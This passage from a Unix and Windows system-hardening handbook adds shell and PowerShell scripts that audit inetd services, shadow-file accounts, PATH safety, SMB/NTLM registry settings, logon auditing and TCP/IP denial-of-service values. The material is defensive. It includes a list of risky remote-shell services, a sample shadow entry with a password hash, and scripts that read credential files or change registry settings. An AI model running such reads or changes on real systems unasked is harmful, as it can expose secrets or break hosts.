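# illustration; the format is classic inetd.conf (xinetd uses another syntax).

# Services the handbook says to disable or replace. inetd names them by
# service, so rlogin is "login", rsh is "shell" and rexec is "exec".
RISKY_SERVICES="telnet login shell exec ftp finger rexd"

# audit_inetd FILE
# Prints one line per enabled service:
#   <service> <user> <wrapped|UNWRAPPED> [RISKY]
audit_inetd() {
    awk -v risky="$RISKY_SERVICES" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) isrisky[r[i]] = 1 }
        /^[[:space:]]*#/ || NF < 6 { next }       # skip comments, blanks, malformed lines
        {
            svc = $1; sub(/\/.*/, "", svc)        # "rexd/1" (RPC version suffix) -> "rexd"
            # field 6 is the server program; tcpd there means the wrapper is in use
            wrapped = ($6 ~ /(^|\/)tcpd$/) ? "wrapped" : "UNWRAPPED"
            line = svc " " $5 " " wrapped
            if (svc in isrisky) line = line " RISKY"
            print line
        }' "$1"
}

# count_unwrapped FILE: number of enabled services not protected by tcpd.
count_unwrapped() {
    audit_inetd "$1" | awk '/UNWRAPPED/ { n++ } END { print n + 0 }'
}

# sample_inetd_conf: constructed sample, not taken from any real system.
sample_inetd_conf() {
    cat <<'EOF'
# constructed inetd.conf sample
ftp      stream  tcp      nowait  root    /usr/sbin/tcpd        in.ftpd -l -a
telnet   stream  tcp      nowait  root    /usr/sbin/in.telnetd  in.telnetd
#finger  stream  tcp      nowait  nobody  /usr/sbin/tcpd        in.fingerd
finger   stream  tcp      nowait  nobody  /usr/sbin/in.fingerd  in.fingerd
rexd/1   stream  rpc/tcp  wait    root    /usr/sbin/rpc.rexd    rpc.rexd

EOF
}

# Usage: ./inetd_audit.sh /etc/inetd.conf
if [ "$#" -eq 1 ]; then
    audit_inetd "$1"
fi
```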
Use Secure RPC if it's available on your system. Only Secure RPC provides a reasonable basis for using NIS+ or NFS. Avoid using NIS or NIS+ in compatibility mode. If you use NFS, use version 3 in TCP mode if possible, and limit the number of filesystems you export and the set of hosts that may mount them. Try to export filesystems read-only. Unless you specifically tell it not to, NFS protects exported root-owned files from modification by root on the client host, so it can be beneficial to insure that all exported files and directories are owned by root, rather than by other users (such as bin) that might exist on the client host.

If you use X11, enable the best authentication possible. Kerberos or Secure RPC are strong authentication systems. "Magic cookies" are weaker. The xhost program provides the least security. Tunneling X11 connections through SSH also provides strong protection.

If you provide SMB service with Samba, prefer "user" or "domain" security to "share" security. Enable encrypted passwords, and require that clients use a recent version of the SMB protocol with Samba's "min protocol" option. Don't use the "admin user" option or map the DOS archive bit to the Unix executable permission. Learn how to use the "veto files" option.

Keep an eye on your network. Scan the output of netstat and lsof regularly to see what network connections are being made to and from your system. Use who and last to see user connections. Use nmap, Nessus, ISS, and other network security scanners to probe your system from the outside to see if you have vulnerabilities that should be corrected. For some machines, it may be best to disconnect them from the network altogether.

Defending Accounts

The first line of defense for Unix accounts is their password. Unix systems don't store user passwords in plaintext; instead, they store a cryptographic hash of the password that cannot be decrypted into the password.
When a user logs in, the system computes the hash of the password they type and compares it to the stored hash. Older Unix systems stored user account information and encrypted passwords in the /etc/passwd file. This file must be world readable so that processes can associate user ids with login names. Unfortunately, that meant that local users (or others) could copy the passwd file and attempt to find passwords by encrypting common dictionary words, account names, etc., and comparing their encrypted attempts with the passwords listed in the file. Newer Unix systems continue to store public account information in /etc/passwd, but store the encrypted password information in a file called /etc/shadow (or sometimes /etc/passwd.adjunct) that is readable only by root.

Many Unix systems come with several default accounts that are used to separate process or file ownership privileges, such as daemon, bin, uucp, etc. Make sure that the encrypted password entry for all of these accounts begins with a "*" character so that no possible password can be used to access the account. Here's an excerpt of a /etc/shadow file:

    root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156
    bin:*:10890:0:99999:7:::
    daemon:*:10890:0:99999:7:::
    adm:*:10890:0:99999:7:::
    lp:*:10890:0:99999:7:::
    sync:*:10890:0:99999:7:::
    shutdown:*:10890:0:99999:7:::
    halt:*:10890:0:99999:7:::

In this example, only the root account has a valid password. No one can log into the other accounts (although root can still assume their privileges with the su command if necessary).

On many systems, account passwords can be set to expire after a certain amount of time, which provides valuable protection against an attacker taking over a dormant account that the actual owner wouldn't notice. Use a lifetime between one and six months. On many systems, you can require that passwords meet certain strength requirements (length of password, variety of characters, etc.).
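A check for the two shadow-file conditions just described, locked system accounts and a one-to-six-month password lifetime, as an added shell example that is not from the handbook; it reuses the excerpt above as sample input and adds three constructed entries (uucp, guest, alice) with placeholder hashes:

```bash
#!/bin/bash
# Added example, not from the handbook: check a shadow file for the points
# made above: every system account must be locked (password field starting
# with "*" or "!"), no account may have an empty password field, and real
# accounts should have a password lifetime of one to six months.
# Needs only awk. The sample reuses the handbook's excerpt and adds three
# constructed entries whose hashes are placeholders, not real hashes.

# shadow_report FILE: prints "<user> <finding>" for every entry.
#   NO_PASSWORD  empty password field (login without any password)
#   locked       password field starts with "*" or "!"
#   NO_EXPIRY    max-age field (5th) empty or 99999: password never expires
#   LONG_MAXAGE  max age over 180 days, i.e. longer than six months
#   ok           usable account with an acceptable lifetime
shadow_report() {
    awk -F: 'NF >= 2 {
        user = $1; pw = $2; max = $5
        if (pw == "")                   { print user, "NO_PASSWORD"; next }
        if (pw ~ /^[*!]/)               { print user, "locked"; next }
        if (max == "" || max >= 99999)  { print user, "NO_EXPIRY"; next }
        if (max > 180)                  { print user, "LONG_MAXAGE"; next }
        print user, "ok"
    }' "$1"
}

# unlocked_system_accounts FILE: system accounts (the names the handbook
# mentions) whose password field is not locked.
unlocked_system_accounts() {
    awk -F: -v sys="bin daemon adm lp sync shutdown halt uucp nobody" '
        BEGIN { n = split(sys, s, " "); for (i = 1; i <= n; i++) issys[s[i]] = 1 }
        ($1 in issys) && $2 !~ /^[*!]/ { print $1 }' "$1"
}

# sample_shadow: the handbook excerpt plus three constructed entries.
sample_shadow() {
    cat <<'EOF'
root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156
bin:*:10890:0:99999:7:::
daemon:*:10890:0:99999:7:::
adm:*:10890:0:99999:7:::
lp:*:10890:0:99999:7:::
sync:*:10890:0:99999:7:::
shutdown:*:10890:0:99999:7:::
halt:*:10890:0:99999:7:::
uucp:$1$PLACEHOLDER$constructedhashvalue:10890:0:99999:7:::
guest::12264:0:90:7:::
alice:$1$PLACEHOLDER$constructedhashvalue:12264:0:90:7:::
EOF
}

# Usage (as root): ./shadow_audit.sh /etc/shadow
if [ "$#" -eq 1 ]; then
    shadow_report "$1"
    unlocked_system_accounts "$1" | sed 's/^/UNLOCKED_SYSTEM_ACCOUNT /'
fi
```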
This functionality is often available through PAM on systems that support it.

It's a good idea not to create default or guest accounts, but if you must, consider using the rsh or rbash restricted shell so that the account can only run a limited number of commands (don't confuse this with the remote shell client, also called rsh). Make sure that none of the commands provide access to an unrestricted shell (as many editors do).

Protecting Against Programmed Threats

Never unpack or compile new software as root. It's often possible to compile software in a chroot environment to protect yourself against some kinds of Trojan horses.

Keep an eye on the PATH environment variable of users (especially root). The PATH specifies the list of directories that will be checked when a command is typed without giving an absolute path. Root's PATH should only contain standard directories that are writable only by trusted accounts, and that are regularly audited for changes (using software like Tripwire or AIDE). Don't put "." (the current directory) in the PATH, as this makes it easy for attackers to trick root into running Trojaned software. When working as root, get into the habit of typing full paths to important commands (e.g. /bin/su). You should also use full paths in all shell scripts, startup files, or cron jobs that you write.

Preventing Denial of Service Attacks

Unix systems offer several protections against denial of service attacks. Many systems support per-user limits on CPU and memory usage through PAM or other login files, and per-user limits on disk usage through the quota system, if you enable it (and you should).

Processes and Memory

The ps command is used to view processes running on the system. On BSD-based Unix flavors, ps -auxw lists all processes; on SVR5-based flavors, use ps -elf.
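The PATH audit suggested under Protecting Against Programmed Threats above, as an added shell example that is not from the handbook; the finding names are my own and it assumes GNU stat:

```bash
#!/bin/bash
# Added example, not from the handbook: audit a PATH value as the text
# recommends for root's PATH. It flags "." and empty components (an empty
# component, as in "/bin::/usr/bin" or a trailing ":", also means the
# current directory), relative directories, missing directories, and
# directories writable by their group or by everyone. Assumes GNU stat.

# check_path PATHVALUE
# Prints one "<FINDING> <component>" line per problem and returns 1 if any
# were found; prints nothing and returns 0 for a clean PATH.
check_path() {
    rest="$1:"               # trailing sentinel so the last component is seen
    bad=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}; rest=${rest#*:}
        case "$dir" in
            "" | ".")  echo "CURRENT_DIR ${dir:-<empty>}"; bad=1; continue ;;
            /*)        ;;
            *)         echo "RELATIVE $dir"; bad=1; continue ;;
        esac
        if [ ! -d "$dir" ]; then
            echo "MISSING $dir"; bad=1
        elif [ -n "$(find "$dir" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ]; then
            # group- or world-writable: anyone in that group (or anyone at all)
            # can drop a Trojaned "ls" or "su" here for root to run
            echo "WRITABLE $dir (mode $(stat -c '%a' "$dir"), owner $(stat -c '%U' "$dir"))"
            bad=1
        fi
    done
    return "$bad"
}

# Usage: ./check_path.sh "$PATH"
# For root's PATH:  sudo sh -c './check_path.sh "$PATH"'
if [ "$#" -eq 1 ]; then
    check_path "$1"
fi
```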
Each process has a process id number that is used to reference it in commands that interact with running processes. Keep an eye on user processes. Use programs like top and lsof regularly to see what processes your system is running, and by whom. Enable process accounting so you can keep track of processes that have been run in the past and users who might be using excessive processing time. The nice or renice commands can be used to reduce the amount of CPU priority a process has, and are useful for long-running background tasks. Root can also use nice to increase CPU priority for processes, which can be helpful when user processes are bogging down the system and root needs to get enough CPU time to stop them.

The kill command is used to send a signal to a process. Some signals are used to tell daemons to reread configuration files or to notify them about changes in the system. Other signals can be used to suspend or terminate a process. The TERM signal (sent by default with kill, or explicitly using kill -TERM) often terminates a process; the KILL signal unconditionally terminates a process. The TSTP signal suspends a process, and is useful when you want to make an image of the process's memory with gcore for forensic purposes, or when self-replicating processes have taken up all the process slots. In the latter case, you can suspend each process and then kill them all at once so that they cannot spawn.

Unix systems support virtual memory, traditionally called swap space. When the system's processes require more memory than the installed RAM, disk space devoted to swapping is used instead. Insure that you have sufficient swap space on disk partitions (some Unix systems can also swap to files on standard filesystem partitions, although this is less efficient).
Disks

In addition to the quota system, protect disks by isolating critical partitions from those that might be filled accidentally or intentionally, such as mail spool or file upload areas. Insure that each partition has sufficient space and inodes for file storage. Monitor disk usage regularly and encourage users to archive and delete old files.

Microsoft Operating Systems

Microsoft's operating systems began with a focus on standalone personal computing. They were soon actively deployed in networks, initially using Microsoft's own protocols, and later converging primarily on TCP/IP. Systems based on Windows 3.x and Windows 95/98/ME are largely suitable only as client workstations; in contrast, systems based on Windows NT (including Windows 2000 and XP) are often configured as servers and have much more sophisticated security controls [247]. Differences in Windows versions can be dramatic. If you are in an environment that mixes several versions of Windows, each may require different attention. This section focuses primarily on hardening security on NT-based systems.

As with other operating systems, there's no substitute for reading the manuals, as well as other books, web sites, and mailing lists devoted to Windows security. Microsoft's web site includes a large security section with many documents and useful tools, including the Baseline Security Analyzer, a program that analyzes the configuration of NT-based systems and makes recommendations for hardening them. Run it frequently.

Users, Groups, and the Administrator

Windows also uses Users and Groups to control permissions; Groups in particular usually define the abilities of their Users, though finer-grained per-user access controls are also available. As distributed, the user "Administrator" is granted membership in the "Administrators" group, which provides superuser privileges over the system, and represents a key target for attackers. The administrator account can be protected in several ways.
Changing the name of the account to something else makes automated attacks more difficult (though it is often still possible to determine the new name); creating a disabled dummy account named Administrator can help you detect attacks. Administrator logins can be restricted to the local console, and can be audited. It's crucial to keep track of which users belong to which groups. The "Computer Management" application in the Administrative Tools folder provides a view of all Users and Groups that are defined.

Filesystems and Security

Windows systems can use two types of filesystems: FAT-based filesystems (FAT, VFAT, FAT32) are compatible with all versions of Microsoft's operating systems, while NTFS filesystems are only supported by NT-based versions. Only NTFS provides any filesystem security. The FAT filesystem has no concept of file ownership or access control, and should not be used on any secure system.

[247] Oddly, DOS systems are also useful as servers in some situations. Because they are single-user systems that offer few points of attack, they can be highly suitable for use as single-purpose log servers, terminal servers, firewalls, and even DNS servers.

Access to files and directories on NTFS systems is managed through Access Control Lists (ACLs). ACLs typically specify which permissions (read, write, execute, list contents, modify, or full control, among others) have been granted to which groups of users. Each object in the filesystem (and in the Windows registry) has an associated ACL or inherits one from a folder above it. The ACL system is a powerful and complicated security tool that requires considerable study. Microsoft provides some security templates that assign reasonable ACLs to system folders and registry keys, but you may wish to be more restrictive.

Encryption

Microsoft Windows provides a unified CryptoAPI library for cryptographic support.
On NTFS filesystems, files and directories can be encrypted using the cipher.exe tool, which sets up a transparent encrypted file system (EFS). EFS is based on public key cryptography, so remote users can access their encrypted data as long as they present the appropriate private key; in addition, EFS can be configured so administrators can recover encrypted data if the key is lost (which may or may not enhance security).

TCP/IP Networking

Before Windows 2000

Microsoft Windows supported a peer-to-peer Ethernet networking model (NetBIOS over the NetBEUI transport protocol) before the widespread emergence of TCP/IP, and the legacy of NetBIOS remains in Microsoft's Printer and File sharing services, which are implemented as NetBIOS over TCP/IP (sometimes called "NBT"). The file sharing protocol itself is referred to as Server Message Block (SMB) or CIFS. Internet RFCs 1001 and 1002 describe NetBIOS over TCP/IP in great detail.

NetBIOS includes its own host name resolution and authentication protocols. In the simplest model, NetBIOS nodes (hosts) discover each other and register their names on the network by using broadcast packets. In addition to being difficult to scale up to larger networks, this mode makes it relatively simple for nodes to "steal" one another's registered name and effectively impersonate one another. A more secure mode of operation requires the NetBIOS nodes to communicate (point-to-point) with hosts designated as NetBIOS name service nodes (sometimes called WINS servers) to register and look up names, and with NetBIOS datagram distribution nodes to broadcast packets at the NetBIOS level. The NetBIOS name servers can provide safeguards against machines spoofing each other's names.
In addition, the registry key HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnDemand can be set to 1 to prevent servers from responding to name release requests that might be forged by an attacker who wishes to claim a server's name and impersonate the server.

In most cases, users who wish to use a resource must first log into the SMB server providing that resource. The login process in modern SMB dialects uses challenge-response authentication [248]. When a user requests to log in, the SMB server sends a unique challenge string to the client. The client encrypts this string using a session key computed from a cryptographic hash of the user's password and returns the response to the SMB server. The SMB server performs the same computation and compares its results to the client's. If they match, the user is authenticated. The exact form of the computation depends on the SMB dialect in use; two major approaches ("LM" and "NT") are currently defined.

[248] Older SMB dialects (e.g., that used in Windows for Workgroups) allowed plaintext passwords to be sent over the network.

Note that this approach implies that the SMB server (or some other authentication server with which it communicates) has the user's hashed password available to it (but not necessarily the cleartext password). If this server is compromised, all the users' hashed passwords are compromised (so the attacker may be able to masquerade as the user and connect to other SMB servers). On the other hand, this approach prevents the cleartext or hashed password from ever traveling over the network. SMB authentication servers must thus be protected like Kerberos domain controllers.

If Windows file sharing will not be used, NetBIOS over TCP/IP can be completely disabled in the Advanced TCP/IP Settings.
If all machines in the network support the newer versions of the NetBIOS/SMB protocols, they should be configured to respond only to requests using the latest protocol version they support (NTLMv2 in most cases), to prevent an attacker from negotiating down to an earlier, flawed protocol. The LM variant is especially weak: the LM hash is computed from the password upper-cased and split into two 7-character halves, so it can be brute-forced quickly, and storage of LM hashes should be disabled wherever legacy clients do not require it.

If remote administration of filesystems is not necessary, the registry value AutoShareWks under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters can be set to 0 to disable the automatic administrative shares (C$, ADMIN$ and so on); AutoShareServer is the equivalent on server editions.

Windows can be configured to allow remote users access not only to files, but also to registry keys. The security permissions on the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurePipeServers\winreg key determine which users can modify the registry remotely. It is important to ensure that this access list includes only Administrators if remote access is necessary, and nobody at all otherwise. The Remote Registry service can also be disabled.

The Advanced TCP/IP Settings for network adapters on Windows NT-based systems include a simple packet filter (TCP/IP Filtering) that can be configured to permit only listed incoming TCP or UDP destination ports and IP protocol numbers. It is stateless and applies to inbound traffic only.

Since Windows 2000

Windows 2000 domains provide significantly more control over participating clients than was available in earlier versions. Notably, domain security policy overrides a client's local security policy when the client joins the domain, which is useful for centrally ensuring that client workstations have strong security. Windows 2000 and later systems use Kerberos as their primary network authentication protocol, although they continue to support NetBIOS and NTLM, so the recommendations above still apply. Kerberos, as discussed earlier in this handbook, provides secure authentication (and, through its tickets, a basis for authorization) for network services. Every Windows 2000 domain controller runs the Kerberos Key Distribution Center (KDC) for its domain; unlike a Unix Kerberos realm there is no single master KDC. Windows 2000 also supports IPsec for creating virtual private networks.
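The NetBT, SMB authentication and remote-registry settings discussed above can be checked, and optionally enforced, from an elevated PowerShell prompt. The following script is an added example written for this edition; it is not code from the original handbook or from Microsoft. It assumes a current Windows host (PowerShell 5 or later) on which the registry paths named in the text still exist, and the target values it encodes (LmCompatibilityLevel=5 for NTLMv2-only, NoLMHash=1 to stop storing the LM hash at the next password change) are this editor's baseline rather than values the handbook prescribes. Without -Apply it only reports drift.

```powershell
# Audit (and optionally enforce) the NetBIOS/SMB hardening settings
# discussed in the text. Added example; assumes an elevated PowerShell 5+
# session. Each entry: registry key, value name, desired value, and why.
$Baseline = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'
       Name = 'NoNameReleaseOnDemand'; Want = 1
       Why  = 'ignore forged NetBIOS name-release requests' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'LmCompatibilityLevel'; Want = 5
       Why  = 'send and accept NTLMv2 only; refuse LM and NTLMv1' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'NoLMHash'; Want = 1
       Why  = 'stop storing the weak LM hash (XP/2003 and later; a key on 2000)' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'AutoShareWks'; Want = 0
       Why  = 'no automatic C$/ADMIN$ shares on workstations' }
)

function Get-DwordValue([string]$Path, [string]$Name) {
    # $null when the key or value is absent. Absent usually means the
    # insecure default is in effect, so the caller treats it as drift.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Test-SmbHardening([switch]$Apply) {
    foreach ($b in $Baseline) {
        $have = Get-DwordValue $b.Path $b.Name
        $ok   = ($have -eq $b.Want)
        [pscustomobject]@{
            Setting = $b.Name; Current = $have; Wanted = $b.Want
            Compliant = $ok; Reason = $b.Why
        }
        if (-not $ok -and $Apply) {
            if (-not (Test-Path $b.Path)) { New-Item -Path $b.Path -Force | Out-Null }
            New-ItemProperty -Path $b.Path -Name $b.Name -Value $b.Want `
                             -PropertyType DWord -Force | Out-Null
        }
    }
}

function Test-RemoteRegistryExposure {
    # The ACL on the winreg key is the gate for remote registry access and
    # the Remote Registry service is the door; report both.
    $winreg = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
    $acl = Get-Acl -Path $winreg
    $unexpected = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -notmatch 'Administrators|LOCAL SERVICE|Backup Operators'
    }
    $svc = Get-Service -Name RemoteRegistry -ErrorAction SilentlyContinue
    [pscustomobject]@{
        WinregUnexpectedAllow = @($unexpected | ForEach-Object {
            "$($_.IdentityReference): $($_.RegistryRights)" })
        RemoteRegistryState   = if ($svc) { "$($svc.Status)/$($svc.StartType)" } else { 'not installed' }
    }
}

Test-SmbHardening | Format-Table -AutoSize
Test-RemoteRegistryExposure | Format-List
# To enforce:  Test-SmbHardening -Apply
#              Stop-Service RemoteRegistry; Set-Service RemoteRegistry -StartupType Disabled
```

Changing LmCompatibilityLevel to 5 on a server breaks clients that can only send LM or NTLMv1 responses, so run the report across the fleet before applying it; the same applies to AutoShareWks, which removes the administrative shares that remote management tools rely on.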
IPsec negotiation can be requested or required on client and server connections. Note the difference: a "request" policy falls back to cleartext if the peer does not answer with IPsec, so it gives no protection against an active attacker, while "require" refuses the connection instead. IPsec is configured through the IP Security Policy Management snap-in. Earlier Windows versions used Microsoft's PPTP protocol for VPN tunnels, whose MS-CHAP authentication has known weaknesses; in most cases you should prefer IPsec unless you must support older systems. Windows XP also added a built-in stateful packet filter, the Internet Connection Firewall (ICF), that is ideal for systems used as Internet clients. By default it admits only incoming packets belonging to connections the client itself initiated.

Defending Accounts

Recent Windows-based systems support long passwords for accounts. Encourage or force users to use longer passwords or passphrases rather than shorter ones to reduce the risk of password guessing. These systems also support "complexity requirements" for passwords and password expiration. On systems participating in Windows 2000 domains, passwords are stored on the domain controllers and managed in the usual Kerberos fashion. Account lockout settings can also be turned on to make password-guessing attempts more costly, bearing in mind that an attacker can use lockout to deny service to legitimate users.

By default, most Windows systems ship with security auditing turned off. Auditing is configured in the Local Security Policy (or through the domain security policy). Turn on auditing for account logon events and account management (success and failure) in order to keep an eye on attempted logins; logging several kinds of failure events (such as failed privilege use) is also helpful. Audited events are displayed in the Event Viewer. Be sure to set maximum sizes for all logs (through the Event Viewer), and to disable guest access to logs.

Protecting Against Programmed Threats

Windows NT-based systems often come configured with several services enabled.
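The account-policy and auditing recommendations in the section above map onto a handful of commands. The script below is an added example for this edition, not part of the original handbook or of any Microsoft documentation. It assumes an elevated PowerShell 5 or later session on a host where these settings are not overridden by domain Group Policy; the numeric thresholds (14-character minimum, 10-attempt lockout, 64 MB logs) are illustrative choices, and event 4625 is the failed-logon event on Windows Vista and later (NT, 2000 and XP logged 529 instead).

```powershell
# Local password/lockout policy, audit policy, log limits and a failed-logon
# summary. Added example; assumes an elevated PowerShell 5+ session.

function Set-AccountPolicy {
    # net accounts sets the local password and lockout policy. Password
    # complexity has no net.exe switch; it is set in Local Security Policy
    # (or with secedit / Group Policy).
    net accounts /minpwlen:14 /maxpwage:90 /minpwage:1 /uniquepw:12 | Out-Null
    net accounts /lockoutthreshold:10 /lockoutduration:30 /lockoutwindow:30 | Out-Null
    net accounts     # print the resulting policy
}

function Set-LogonAuditing {
    # Success and failure for logons and account management, failure only
    # for privilege use, as the text suggests. auditpol is built in from
    # Windows Vista / Server 2008 onward.
    auditpol /set /category:"Account Logon"      /success:enable /failure:enable | Out-Null
    auditpol /set /category:"Logon/Logoff"       /success:enable /failure:enable | Out-Null
    auditpol /set /category:"Account Management" /success:enable /failure:enable | Out-Null
    auditpol /set /category:"Privilege Use"      /failure:enable                 | Out-Null
    auditpol /get /category:*
}

function Set-EventLogLimits([int]$MaxMB = 64) {
    # Bound each log so a flood of events cannot fill the disk, and keep
    # guests away from the logs (RestrictGuestAccess is the registry form
    # of the Event Viewer setting on NT-era systems; harmless on newer ones).
    foreach ($log in 'Security', 'System', 'Application') {
        Limit-EventLog -LogName $log -MaximumSize ($MaxMB * 1MB) -OverflowAction OverwriteAsNeeded
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\$log"
        New-ItemProperty -Path $key -Name RestrictGuestAccess -Value 1 -PropertyType DWord -Force | Out-Null
    }
}

function Get-FailedLogonSummary([int]$Hours = 24) {
    # Group failed logons by target account and source address. One account
    # with many failures from one address is a guessing attempt; many
    # accounts from one address is a password spray.
    $filter = @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = ([xml]$_.ToXml()).Event.EventData.Data      # named EventData fields
        [pscustomobject]@{
            Account   = ($d | Where-Object Name -eq 'TargetUserName').'#text'
            Source    = ($d | Where-Object Name -eq 'IpAddress').'#text'
            LogonType = ($d | Where-Object Name -eq 'LogonType').'#text'
        }
    } | Group-Object Account, Source | Sort-Object Count -Descending |
        Select-Object Count, @{ n = 'Account, Source'; e = { $_.Name } } -First 20
}

Set-AccountPolicy
Set-LogonAuditing
Set-EventLogLimits
Get-FailedLogonSummary | Format-Table -AutoSize
```

Get-FailedLogonSummary is the part worth scheduling: the policy commands are set once, but the failure counts are what tells you whether the lockout threshold is being hit by a user or by an attacker.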
Windows services, like Unix daemons, are background processes that provide functions to applications. In some cases, these services are reachable by outsiders over the network, because they offer remote access (like telnet) or remote procedure calls. For example, the Messenger service lets remote machines pop up alert windows on local machines, and has been abused by spammers. Using the Services application in the Computer Management console, ensure that all unnecessary services are stopped and disabled. On clients that don't share files, the Telnet, Server, Remote Registry, and several other remote access services can be disabled to reduce the points of vulnerability (sometimes at the expense of centralized management). Using the local or group security policy, ensure that anonymous users have no access without explicit permissions (this setting appears in the Security Options folder under Local Policies on Windows 2000).

Preventing Denial of Service Attacks

Processes and Memory

Windows processes can be monitored and halted with the Task Manager. Task Manager can also adjust a process's priority to one of six classes, from "Low" to "Realtime", and display memory usage. Because few Windows systems are used as multiuser timesharing hosts, process and memory exhaustion is usually the result of an errant program that can be detected and halted through Task Manager.

Disks

NTFS supports per-user disk quotas that can be used to protect disks from filling up. Again, this is most useful on shared client workstations, as servers should generally have few users other than their administrators, and server applications often require administrative privileges.

Network

Windows NT-based systems provide several registry settings that can help protect them from some kinds of network denial of service attacks, such as SYN flooding. In most cases, however, these settings are not enabled by default.
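The two pieces of the advice above that are easiest to get wrong in practice are leaving a remote-access service enabled because nobody checked what still listens, and assuming the TCP/IP denial-of-service values are set when they are merely documented. The script below is an added example for this edition (not code from the original handbook or from Microsoft) that disables the services the text names, lists what still listens on TCP, and reports the Tcpip\Parameters values this handbook names (SynAttackProtect, TcpMaxHalfOpen, TcpMaxHalfOpenRetried, EnablePMTUDiscovery, EnableDeadGWDetect, EnableICMPRedirect) plus per-interface router discovery against an editor-chosen baseline. It assumes an elevated PowerShell 5 or later session on Windows 8 / Server 2012 or newer (for Get-NetTCPConnection). Two caveats: Messenger and Telnet do not exist on current Windows, and the script simply reports that; and on Windows Vista and later the TCP/IP stack was rewritten so that SYN-attack protection is always on and SynAttackProtect and TcpMaxHalfOpen* are no longer consulted, while the ICMP redirect, PMTU discovery and dead-gateway values still are.

```powershell
# Service attack surface and TCP/IP denial-of-service settings.
# Added example; assumes an elevated PowerShell 5+ session.

function Disable-UnneededService([string[]]$Names) {
    foreach ($n in $Names) {
        $svc = Get-Service -Name $n -ErrorAction SilentlyContinue
        if (-not $svc) { [pscustomobject]@{ Service = $n; Result = 'not installed' }; continue }
        if ($svc.Status -ne 'Stopped') { Stop-Service -Name $n -Force -ErrorAction SilentlyContinue }
        Set-Service -Name $n -StartupType Disabled
        [pscustomobject]@{ Service = $n; Result = "stopped, startup Disabled (was $($svc.StartType))" }
    }
}

function Get-NetworkListeners {
    # What is still reachable after the services are gone: each listening
    # TCP port mapped to the process that owns it.
    Get-NetTCPConnection -State Listen | Sort-Object LocalPort -Unique |
        Select-Object LocalAddress, LocalPort,
            @{ n = 'Process'; e = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } }
}

$TcpipBase = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters'
# Desired values. $null means "examine, decide per host": the handbook names
# the half-open limits without prescribing numbers.
$DosBaseline = @{
    SynAttackProtect      = 1
    TcpMaxHalfOpen        = $null
    TcpMaxHalfOpenRetried = $null
    EnablePMTUDiscovery   = 0
    EnableDeadGWDetect    = 0
    EnableICMPRedirect    = 0
}

function Test-TcpipDosSettings {
    $current = Get-ItemProperty -Path $TcpipBase
    foreach ($name in ($DosBaseline.Keys | Sort-Object)) {
        $have = $current.$name          # $null when the value is absent
        $want = $DosBaseline[$name]
        [pscustomobject]@{
            Setting   = $name
            Current   = if ($null -eq $have) { '(absent: default)' } else { $have }
            Wanted    = if ($null -eq $want) { 'review' } else { $want }
            Compliant = if ($null -eq $want) { $null } else { $have -eq $want }
        }
    }
    # Router discovery is configured per interface; 0 means never act on
    # ICMP router advertisements for that adapter. Absent counts as drift.
    Get-ChildItem -Path "$TcpipBase\Interfaces" | ForEach-Object {
        $prd = (Get-ItemProperty -Path $_.PSPath).PerformRouterDiscovery
        [pscustomobject]@{
            Setting   = "Interfaces\$($_.PSChildName)\PerformRouterDiscovery"
            Current   = if ($null -eq $prd) { '(absent: default)' } else { $prd }
            Wanted    = 0
            Compliant = ($prd -eq 0)
        }
    }
}

Disable-UnneededService -Names 'Messenger', 'TlntSvr', 'RemoteRegistry' | Format-Table -AutoSize
Get-NetworkListeners | Format-Table -AutoSize
Test-TcpipDosSettings | Format-Table -AutoSize
```

The Server service (LanmanServer) is deliberately not in the default list: disabling it on a client that does not share files is sound advice, as the text says, but it also removes the administrative shares and remote management paths, so add it only where that trade-off has been accepted.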
Settings to examine include (under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters) SynAttackProtect, TcpMaxHalfOpen and TcpMaxHalfOpenRetried. Other kinds of denial of service attacks can be made more difficult by disabling automatic detection and discovery functions. The values EnablePMTUDiscovery, EnableDeadGWDetect, and EnableICMPRedirect should be set to 0 so that the system does not react to unusual (and possibly forged) network conditions in surprising ways, such as rerouting traffic through an attacker's host because of a spoofed ICMP redirect. Interfaces should be directed not to perform automatic router discovery (PerformRouterDiscovery under each interface's key), and should be configured with static routes.

ANNEXES

ANNEX 1. GLOSSARY
ANNEX 2. HANDBOOK BIBLIOGRAPHY
ANNEX 3. ELECTRONIC RESOURCES
ANNEX 4. ORGANIZATIONS
ANNEX 5. PRINT RESOURCES

ANNEX 1. GLOSSARY

802.11
802.11 is a set of developing IEEE standards for wireless local area networks (WLAN). The IEEE fosters the development of standards that often become national and international standards. The organization publishes a number of journals, has many local chapters, and several large societies in special areas, such as the IEEE Computer Society. For further information on the IEEE and the IEEE Computer Society, see http://standards.ieee.org and http://www.computer.org/. Information about definitions and functional requirements for 802.11 may be found in this document: http://grouper.ieee.org/groups/802/11/Documents/DocumentArchives/1992_docs/1192091.DOC

Access
The ability to enter a secured area and, in the case of accessing a computer, to read, write, modify, or use any of the computer's system resources.

Access authorization
